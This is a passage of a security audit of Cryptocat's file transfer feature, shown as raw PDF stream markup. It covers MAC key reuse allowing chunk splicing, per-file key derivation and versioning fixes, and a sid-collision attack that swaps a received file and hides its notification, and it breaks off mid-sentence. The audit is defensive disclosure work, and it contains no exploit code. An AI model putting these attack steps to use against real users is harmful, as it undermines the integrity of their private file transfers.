cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 48 re B* Q q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F4 10 Tf 12 TL (the chunk number $rcvFile[from][sid].ctr$) Tj T* (the total number of chunks $rcvFile[from][sid].total$) Tj T* (the chunk contents) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 291.8236 cm q BT 1 0 0 1 0 50 Tm 1.289988 Tw 12 TL /F1 10 Tf 0 0 0 rg (Due to the key reuse vulnerability described in Issue A, it is possible for two files to be sent using the) Tj T* 0 Tw 1.745984 Tw (same ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key $the encryption and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys are both derived from the ) Tj /F4 10 Tf (extra_symkey ) Tj /F1 10 Tf (created in) Tj T* 0 Tw .374692 Tw /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session initialization$. When this happens, a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag that is valid for a given chunk of one) Tj T* 0 Tw .566179 Tw (file, will also be valid for the same chunk of the other file, provided that the total number of chunks is the) Tj T* 0 Tw (same.) Tj T* ET Q Q q 1 0 0 1 62.69291 273.8236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (This allows chunks to be "spliced" between the files, violating the expected integrity guarantees.) Tj T* ET Q Q q 1 0 0 1 62.69291 231.8236 cm q BT 1 0 0 1 0 26 Tm 2.497318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The requirement that the files have the same number of chunks cannot be considered unlikely; for) Tj T* 0 Tw 1.123145 Tw (example, it is common for files to have length <) Tj (= 64511 bytes, and files that are revisions of the same) Tj T* 0 Tw (document are also likely to be similar in length.) Tj T* ET Q Q q 1 0 0 1 62.69291 213.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The same comments on ) Tj /F3 10 Tf (DHSession ) Tj /F1 10 Tf (rotation as for Issue A apply to this issue.) Tj T* ET Q Q q 1 0 0 1 62.69291 213.8236 cm Q endstream endobj % 'R184': class PDFStream 184 0 obj % page stream << /Length 7900 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Mitigation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2013-11-06) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Live Mitigation: ) Tj /F1 10 Tf (We recommend these immediate mitigations to protect existing live users:) Tj T* ET Q Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 681.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.566235 Tw 12 TL /F1 10 Tf 0 0 0 rg (Notify users that file transfer may lose confidentiality and integrity, and that users with a low risk) Tj T* 0 Tw (tolerance should not transfer files using ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 675.0236 cm Q q 1 0 0 1 62.69291 639.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 2.08748 Tw 12 TL /F1 10 Tf 0 0 0 rg (Simultaneously, distribute a new stable release of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (, with version number 2.1.16, which) Tj T* 0 Tw 1.333318 Tw (disables the file transfer feature $both send and receive$, and has no other changes compared to) Tj T* 0 Tw (2.1.15.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 639.0236 cm Q q 1 0 0 1 62.69291 609.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.943318 Tw (We recommend doing these steps right away instead of hurrying to publish an improved file transfer) Tj T* 0 Tw (feature, because:) Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 102 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (It protects users, although admittedly it also inconveniences them.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 96 cm Q q 1 0 0 1 20 60 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.626905 Tw (It delays publishing details that attackers could use to exploit users. This potentially protects) Tj T* 0 Tw .454985 Tw (users more than if we simultaneously inform attackers of how to exploit users of the old version) Tj T* 0 Tw (at the same moment as announcing to users that they should stop relying on the old version.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 54 cm Q q 1 0 0 1 20 42 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Any other mitigation deserves careful analysis before implementation and deployment.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 36 cm Q q 1 0 0 1 20 0 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 2.859983 Tw (Future design and mitigation changes may benefit from other findings in this audit. If we) Tj T* 0 Tw .790814 Tw (immediately patch one problem, only to later discover another vulnerability with an unexpected) Tj T* 0 Tw (relationship to the patch, that effort may be thwarted.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q 1 0 0 1 62.69291 483.0236 cm Q q 1 0 0 1 62.69291 453.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Remediation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 62.69291 435.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 405.0236 cm q BT 1 0 0 1 0 14 Tm 5.484524 Tw 12 TL /F2 10 Tf 0 0 0 rg (Design and Implementation Mitigation: ) Tj /F1 10 Tf (We recommend that after the ) Tj /F3 10 Tf (Live Mitigation ) Tj /F1 10 Tf (steps) Tj T* 0 Tw (recommended above, the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (team perform the following steps:) Tj T* ET Q Q q 1 0 0 1 62.69291 399.0236 cm Q q 1 0 0 1 62.69291 399.0236 cm Q q 1 0 0 1 62.69291 387.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Update the file transfer feature to be secure, for a future release of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 381.0236 cm Q q 1 0 0 1 62.69291 345.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .37498 Tw (Simultaneously with committing this patch to a publicly-readable source code repository $i.e. github$,) Tj T* 0 Tw 1.963984 Tw (publish a document $e.g. blog post$ describing the details of the vulnerability and how the fixed) Tj T* 0 Tw (version avoids it.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 345.0236 cm Q q 1 0 0 1 62.69291 327.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (We are willing to help design a future file transfer protocol, if desired.) Tj T* ET Q Q q 1 0 0 1 62.69291 300.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Versioning) Tj T* ET Q Q q 1 0 0 1 62.69291 222.0236 cm q BT 1 0 0 1 0 62 Tm 2.59528 Tw 12 TL /F1 10 Tf 0 0 0 rg (One valuable feature of a new file transfer protocol would be ) Tj /F3 10 Tf (versioning) Tj /F1 10 Tf (. Ideally, if one of the two) Tj T* 0 Tw .104987 Tw (endpoints is running code with the new file transfer protocol and the other is running code with file transfer) Tj T* 0 Tw 1.947633 Tw (disabled $e.g. version 2.1.18$ or with the old file transfer protocol $version ) Tj /F6 10 Tf 12 TL (\243) Tj /F1 10 Tf 12 TL ( 2.1.15$, users will get a) Tj T* 0 Tw .951235 Tw (graceful failure \227such as the file-transfer option being disabled in the UI along with an explanation that) Tj T* 0 Tw .621988 Tw (the other peer is using too old of a version\227 instead of an ungraceful failure such as silent failure, or an) Tj T* 0 Tw (error message that could frighten or confuse a user.) Tj T* ET Q Q q 1 0 0 1 62.69291 168.0236 cm q BT 1 0 0 1 0 38 Tm .342927 Tw 12 TL /F1 10 Tf 0 0 0 rg (Similarly, it would protect users of older ) Tj /F3 10 Tf (Cryptocats ) Tj /F1 10 Tf (if their ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (client would not ) Tj /F3 10 Tf (attempt ) Tj /F1 10 Tf (to send files) Tj T* 0 Tw 2.464104 Tw (to a newer ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (, because doing so could expose the contents of their files even if the newer) Tj T* 0 Tw .569985 Tw /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (will not accept the transfer, so the new protocol could be designed to prevent older ) Tj /F3 10 Tf (Cryptocats) Tj T* 0 Tw /F1 10 Tf (from attempting to send to it.) Tj T* ET Q Q q 1 0 0 1 62.69291 138.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .076098 Tw (We do not currently have a specific protocol in mind to accomplish such versioning, but would be willing to) Tj T* 0 Tw (help try to design one.) Tj T* ET Q Q endstream endobj % 'R185': class PDFStream 185 0 obj % page stream << /Length 4230 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Generate per-file keys) Tj T* ET Q Q q 1 0 0 1 62.69291 708.0236 cm q BT 1 0 0 1 0 26 Tm 2.280651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol provides a secure shared symmetric key $called the \223extra symmetric key\224 in the) Tj T* 0 Tw .143988 Tw /F4 10 Tf (otr.js ) Tj /F1 10 Tf (source code$, but if ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (is going to send ) Tj /F3 10 Tf (multiple ) Tj /F1 10 Tf (files, it can't just use that key, but needs a) Tj T* 0 Tw (unique key or ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (for each file.) Tj T* ET Q Q q 1 0 0 1 62.69291 678.0236 cm q BT 1 0 0 1 0 14 Tm .189461 Tw 12 TL /F1 10 Tf 0 0 0 rg (One way to accomplish that would be to use a Key Derivation Function $) Tj /F3 10 Tf (KDF) Tj /F1 10 Tf ($. A ) Tj /F3 10 Tf (KDF ) Tj /F1 10 Tf ($e.g. ) Tj 0 0 .501961 rg (HKDF) Tj 0 0 0 rg ($ can be) Tj T* 0 Tw (used as a function that takes two arguments\227secret key and diversifier\227and returns a new secret key.) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm q BT 1 0 0 1 0 38 Tm .482485 Tw 12 TL /F3 10 Tf 0 0 0 rg (Cryptocat ) Tj /F1 10 Tf (could use the "file identifier" $typically called the "filename" in the source code and protocol$ as) Tj T* 0 Tw .451567 Tw (the diversifier. So, let current encryption key \227the one stored at index 0 in the ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (object in the ) Tj /F4 10 Tf (files) Tj T* 0 Tw 1.179983 Tw /F1 10 Tf (hashtable in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (\227 be called the "master encryption key", and let the current ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key) Tj T* 0 Tw (\227the one stored at index 1 in the ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (object\227 be called the "master ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key". Then:) Tj T* ET Q Q q 1 0 0 1 62.69291 578.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 36 re B* Q q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F4 10 Tf 12 TL (file Enc key = KDF$key=master Enc key, diversifier=file identifier$) Tj T* (file MAC key = KDF$key=master MAC key, diversifier=file identifier$) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 546.8236 cm q BT 1 0 0 1 0 14 Tm .274692 Tw 12 TL /F1 10 Tf 0 0 0 rg (Then, the rest of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (v2.1.15 file transfer protocol could be used as-is, but using the file-specific) Tj T* 0 Tw (Enc and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys instead of the master Enc and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys for encryption and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (respectively.) Tj T* ET Q Q q 1 0 0 1 62.69291 480.8236 cm q BT 1 0 0 1 0 50 Tm 1.70832 Tw 12 TL /F1 10 Tf 0 0 0 rg (For this approach to be secure, the diversifier does not need to be confidential, but does need to be) Tj T* 0 Tw 1.157633 Tw (unique within the scope of a given master key. The file identifiers in the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (v2.1.15 protocol are) Tj T* 0 Tw .222485 Tw (random 128-bit values, so they can be relied on to have this uniqueness property. $The master encryption) Tj T* 0 Tw .56832 Tw (key and master ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key, of course, need to be confidential, just as in the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (v2.1.15 file transfer) Tj T* 0 Tw (protocol.$) Tj T* ET Q Q q 1 0 0 1 62.69291 453.8236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (New standard file transfer protocol) Tj T* ET Q Q q 1 0 0 1 62.69291 399.8236 cm q BT 1 0 0 1 0 38 Tm 2.13881 Tw 12 TL /F1 10 Tf 0 0 0 rg (A longer term strategy is to promote and adopt a file transfer standard in the wider secure protocol) Tj T* 0 Tw .376412 Tw (community. We recognize that the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (team has already solicited feedback from this community on) Tj T* 0 Tw 1.16061 Tw (the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (development list, and we hope to advocate for more review and collaboration on this protocol) Tj T* 0 Tw (feature.) Tj T* ET Q Q q 1 0 0 1 62.69291 399.8236 cm Q endstream endobj % 'R186': class PDFStream 186 0 obj % page stream << /Length 8049 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 21 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue C. Substitution of File Contents By Hijacking Entry in User) Tj T* (Interface) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 681.0236 cm q BT 1 0 0 1 0 14 Tm .370651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The file transfer feature uses a sender-supplied identifier to index into the receiver's display of) Tj T* 0 Tw (received files.) Tj T* ET Q Q q 1 0 0 1 62.69291 651.0236 cm q BT 1 0 0 1 0 14 Tm 1.33881 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (The attack targets a file transfer from a "victim sender" to a "victim receiver". An attacker can) Tj T* 0 Tw (replace that file with another file when the victim receiver tries to download it.) Tj T* ET Q Q q 1 0 0 1 62.69291 597.0236 cm q BT 1 0 0 1 0 38 Tm 1.169983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (In order to succeed with high probability, this attack requires passive monitoring of) Tj T* 0 Tw .74561 Tw /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests $or the ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic embedded in those ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests$, in order to) Tj T* 0 Tw .431163 Tw (find the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (of the targeted file transfer. The attacker, acting as another client in the same conversation,) Tj T* 0 Tw (must also send their replacement file to the victim receiver.) Tj T* ET Q Q q 1 0 0 1 62.69291 579.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (Passive monitoring of the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic is feasible through several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 573.0236 cm Q q 1 0 0 1 62.69291 573.0236 cm Q q 1 0 0 1 62.69291 561.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A server compromise $including malicious insiders$ could allow live traffic sniffing,) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 555.0236 cm Q q 1 0 0 1 62.69291 531.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.268443 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed $including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service$, a ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against ) Tj /F3 10 Tf (TLS) Tj T* 0 Tw /F1 10 Tf (protected servers could be used to leverage this attack,) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 525.0236 cm Q q 1 0 0 1 62.69291 513.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 513.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .438221 Tw (An attacker can be assumed to know the conversation name, since that is available by the same passive) Tj T* 0 Tw (monitoring. Therefore, they are able to send their replacement file in the same conversation.) Tj T* ET Q Q q 1 0 0 1 62.69291 417.0236 cm q BT 1 0 0 1 0 50 Tm 1.577045 Tw 12 TL /F1 10 Tf 0 0 0 rg (The replacement file must be sent after the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (is known, and its transfer must complete before the) Tj T* 0 Tw .700574 Tw (targeted file transfer. This is straightfoward if the replacement file is smaller than the targeted one or the) Tj T* 0 Tw .490651 Tw (attacker has higher bandwidth than the victim sender. Alternatively, since the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (increments by one for) Tj T* 0 Tw .398988 Tw (each unique ID used in a session, it can be guessed in advance of a file transfer, allowing the attacker to) Tj T* 0 Tw (start their transfer before the targeted one.) Tj T* ET Q Q q 1 0 0 1 62.69291 375.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .56881 Tw (The attack depends on the victim receiver having a one-to-one chat window to the victim sender open at) Tj T* 0 Tw 1.308221 Tw (the point when the attacker's file transfer completes. If the victim receiver is expecting to receive a file) Tj T* 0 Tw (from a given sender then it is quite likely they will have that buddy's window open.) Tj T* ET Q Q q 1 0 0 1 62.69291 333.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .322765 Tw (The victim receiver will also receive a notification that the attacker has sent a file. The attacker can cause) Tj T* 0 Tw .389461 Tw (the notification to disappear too quickly to be seen, by logging out the buddy used for the attack just after) Tj T* 0 Tw (the transfer completes.) Tj T* ET Q Q q 1 0 0 1 62.69291 279.0236 cm q BT 1 0 0 1 0 38 Tm 1.129983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by source code inspection and by experimentation. To simulate the) Tj T* 0 Tw .193984 Tw (attacker being able to eavesdrop the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (field, the experiments were performed using a modified version) Tj T* 0 Tw 8.74284 Tw (of ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (that forces the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (to zero for every file transfer, by changing the) Tj T* 0 Tw /F4 10 Tf (Strophe.Connection.getUniqueId ) Tj /F1 10 Tf (function.) Tj T* ET Q Q q 1 0 0 1 62.69291 177.0236 cm q BT 1 0 0 1 0 86 Tm 10.63198 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis: ) Tj /F1 10 Tf (The ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (identifying each file transfer is obtained from) Tj T* 0 Tw 4.308976 Tw /F4 10 Tf (Strophe.Connection.getUniqueId) Tj /F1 10 Tf (, which starts at a random integer between 0 and 99999) Tj T* 0 Tw .56832 Tw (inclusive, and increments by one on each call. $Unique IDs are also used for other purposes that are not) Tj T* 0 Tw .371654 Tw (relevant to this issue.$ While a file transfer is in progress, the user interface element in the receiver's chat) Tj T* 0 Tw 1.174985 Tw (window with the sender has a ) Tj /F4 10 Tf (file= ) Tj /F1 10 Tf (attribute referencing the transfer's ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. This attribute is used by) Tj T* 0 Tw 1.013307 Tw /F4 10 Tf (Cryptocat.updateFileProgressBar ) Tj /F1 10 Tf (to update the progress bar, and by ) Tj /F4 10 Tf (Cryptocat.addFile ) Tj /F1 10 Tf (to) Tj T* 0 Tw 3.087633 Tw (replace the progress bar with a download link when the transfer is complete. $It is also used by) Tj T* 0 Tw /F4 10 Tf (Cryptocat.fileTransferError ) Tj /F1 10 Tf (to signal an error.$) Tj T* ET Q Q q 1 0 0 1 62.69291 159.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The attack depends on the following code in ) Tj /F4 10 Tf (Cryptocat.addFile) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 125.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F4 10 Tf 12 TL ($$'[file=' + file + ']'$.replaceWith$fileLink$) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 93.82362 cm q BT 1 0 0 1 0 14 Tm .262651 Tw 12 TL /F1 10 Tf 0 0 0 rg (which performs a global replace of any currently displayed items having the specified ) Tj /F4 10 Tf (file=sid) Tj /F1 10 Tf (, with the) Tj T* 0 Tw /F3 10 Tf (HTML ) Tj /F1 10 Tf (of the new download link given by ) Tj /F4 10 Tf (fileLink ) Tj /F1 10 Tf (.) Tj T* ET Q Q endstream endobj % 'R187': class PDFStream 187 0 obj % page stream << /Length 3386 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 705.0236 cm q BT 1 0 0 1 0 50 Tm .701751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Since this is a global replace $see the ) Tj 0 0 .501961 rg (documentation for replaceWith ) Tj 0 0 0 rg (in ) Tj /F3 10 Tf (jQuery) Tj /F1 10 Tf ($, it affects all file transfer) Tj T* 0 Tw .342485 Tw (elements with the same ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (that are curently visible. Suppose that the victim receiver's client is showing) Tj T* 0 Tw .707984 Tw (the one-to-one chat window for the victim sender, but ) Tj /F4 10 Tf (Cryptocat.addFile ) Tj /F1 10 Tf (is called for a different file) Tj T* 0 Tw .291098 Tw (transfer $in another chat window$ from the attacker to the same receiver. Then, the UI element in the chat) Tj T* 0 Tw (window for the victim sender will be incorrectly updated to link to the attacker's file.) Tj T* ET Q Q q 1 0 0 1 62.69291 663.0236 cm q BT 1 0 0 1 0 26 Tm 2.244651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Because the ) Tj /F3 10 Tf (HTML ) Tj /F1 10 Tf (of the file download link does not contain the ) Tj /F4 10 Tf (file= ) Tj /F1 10 Tf (attribute, any subsequent) Tj T* 0 Tw .655251 Tw (updates of that UI element $including the one that would normally cause it to link to the correct file when) Tj T* 0 Tw (the targeted transfer completes$ will be ignored.) Tj T* ET Q Q q 1 0 0 1 62.69291 621.0236 cm q BT 1 0 0 1 0 26 Tm .82061 Tw 12 TL /F1 10 Tf 0 0 0 rg (For the same reason, the progress bar may also be incorrectly updated, causing it to "bounce" between) Tj T* 0 Tw .354198 Tw (the values for the two transfers with the same ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. Similarly, a file transfer error may cause the wrong UI) Tj T* 0 Tw (element to be updated.) Tj T* ET Q Q q 1 0 0 1 62.69291 591.0236 cm q BT 1 0 0 1 0 14 Tm 3.079147 Tw 12 TL /F2 10 Tf 0 0 0 rg (Live Mitigation: ) Tj /F1 10 Tf (The Cryptocat developers have already $since 2013-11-29$ released a version of) Tj T* 0 Tw (Cryptocat $) Tj 0 0 .501961 rg (v2.1.16) Tj 0 0 0 rg ($ with file transmission disabled, so issue is already mitigated.) Tj T* ET Q Q q 1 0 0 1 62.69291 513.0236 cm q BT 1 0 0 1 0 62 Tm .00936 Tw 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Ensure that ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values are always scoped to a particular buddy $i.e. scoped to a particular) Tj T* 0 Tw .268221 Tw (chat window$. ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values are chosen by the sender under normal operation but could also be chosen by) Tj T* 0 Tw 1.05528 Tw (the server $if the server were malicious or had been confused or compromised by an attack$, and ) Tj /F4 10 Tf (sid) Tj T* 0 Tw .272093 Tw /F1 10 Tf (values cannot be assumed to be unique in any scope other than the buddy that ostensibly sent the sid. In) Tj T* 0 Tw .782988 Tw (fact, per ) Tj 0 0 .501961 rg (strophejs issue 35) Tj 0 0 0 rg (, ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values in the future are all going to start at 0 and increment, and then) Tj T* 0 Tw (restart at 